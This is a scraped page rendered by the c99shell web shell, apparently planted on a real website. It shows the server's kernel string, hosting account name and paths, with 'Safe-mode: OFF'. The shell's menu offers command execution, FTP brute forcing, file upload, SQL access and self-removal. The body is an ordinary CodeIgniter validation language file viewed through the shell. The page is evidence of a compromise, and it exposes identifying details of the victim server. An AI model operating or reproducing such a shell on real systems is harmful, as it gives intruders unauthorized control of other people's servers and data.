smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Language/en/   drwxr-xr-x
Free 3425.78 GB of 4265.01 GB (80.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Validation.php (4.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

// Validation language settings
return [
    
// Core Messages
    
'noRuleSets'      => 'No rulesets specified in Validation configuration.',
    
'ruleNotFound'    => '{0} is not a valid rule.',
    
'groupNotFound'   => '{0} is not a validation rules group.',
    
'groupNotArray'   => '{0} rule group must be an array.',
    
'invalidTemplate' => '{0} is not a valid Validation template.',

    
// Rule Messages
    
'alpha'                 => 'The {field} field may only contain alphabetical characters.',
    
'alpha_dash'            => 'The {field} field may only contain alphanumeric, underscore, and dash characters.',
    
'alpha_numeric'         => 'The {field} field may only contain alphanumeric characters.',
    
'alpha_numeric_punct'   => 'The {field} field may contain only alphanumeric characters, spaces, and  ~ ! # $ % & * - _ + = | : . characters.',
    
'alpha_numeric_space'   => 'The {field} field may only contain alphanumeric and space characters.',
    
'alpha_space'           => 'The {field} field may only contain alphabetical characters and spaces.',
    
'decimal'               => 'The {field} field must contain a decimal number.',
    
'differs'               => 'The {field} field must differ from the {param} field.',
    
'equals'                => 'The {field} field must be exactly: {param}.',
    
'exact_length'          => 'The {field} field must be exactly {param} characters in length.',
    
'greater_than'          => 'The {field} field must contain a number greater than {param}.',
    
'greater_than_equal_to' => 'The {field} field must contain a number greater than or equal to {param}.',
    
'hex'                   => 'The {field} field may only contain hexidecimal characters.',
    
'in_list'               => 'The {field} field must be one of: {param}.',
    
'integer'               => 'The {field} field must contain an integer.',
    
'is_natural'            => 'The {field} field must only contain digits.',
    
'is_natural_no_zero'    => 'The {field} field must only contain digits and must be greater than zero.',
    
'is_not_unique'         => 'The {field} field must contain a previously existing value in the database.',
    
'is_unique'             => 'The {field} field must contain a unique value.',
    
'less_than'             => 'The {field} field must contain a number less than {param}.',
    
'less_than_equal_to'    => 'The {field} field must contain a number less than or equal to {param}.',
    
'matches'               => 'The {field} field does not match the {param} field.',
    
'max_length'            => 'The {field} field cannot exceed {param} characters in length.',
    
'min_length'            => 'The {field} field must be at least {param} characters in length.',
    
'not_equals'            => 'The {field} field cannot be: {param}.',
    
'not_in_list'           => 'The {field} field must not be one of: {param}.',
    
'numeric'               => 'The {field} field must contain only numbers.',
    
'regex_match'           => 'The {field} field is not in the correct format.',
    
'required'              => 'The {field} field is required.',
    
'required_with'         => 'The {field} field is required when {param} is present.',
    
'required_without'      => 'The {field} field is required when {param} is not present.',
    
'string'                => 'The {field} field must be a valid string.',
    
'timezone'              => 'The {field} field must be a valid timezone.',
    
'valid_base64'          => 'The {field} field must be a valid base64 string.',
    
'valid_email'           => 'The {field} field must contain a valid email address.',
    
'valid_emails'          => 'The {field} field must contain all valid email addresses.',
    
'valid_ip'              => 'The {field} field must contain a valid IP.',
    
'valid_url'             => 'The {field} field must contain a valid URL.',
    
'valid_url_strict'      => 'The {field} field must contain a valid URL.',
    
'valid_date'            => 'The {field} field must contain a valid date.',

    
// Credit Cards
    
'valid_cc_num' => '{field} does not appear to be a valid credit card number.',

    
// Files
    
'uploaded' => '{field} is not a valid uploaded file.',
    
'max_size' => '{field} is too large of a file.',
    
'is_image' => '{field} is not a valid, uploaded image file.',
    
'mime_in'  => '{field} does not have a valid mime type.',
    
'ext_in'   => '{field} does not have a valid file extension.',
    
'max_dims' => '{field} is either not an image, or it is too wide or tall.',
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0064 ]--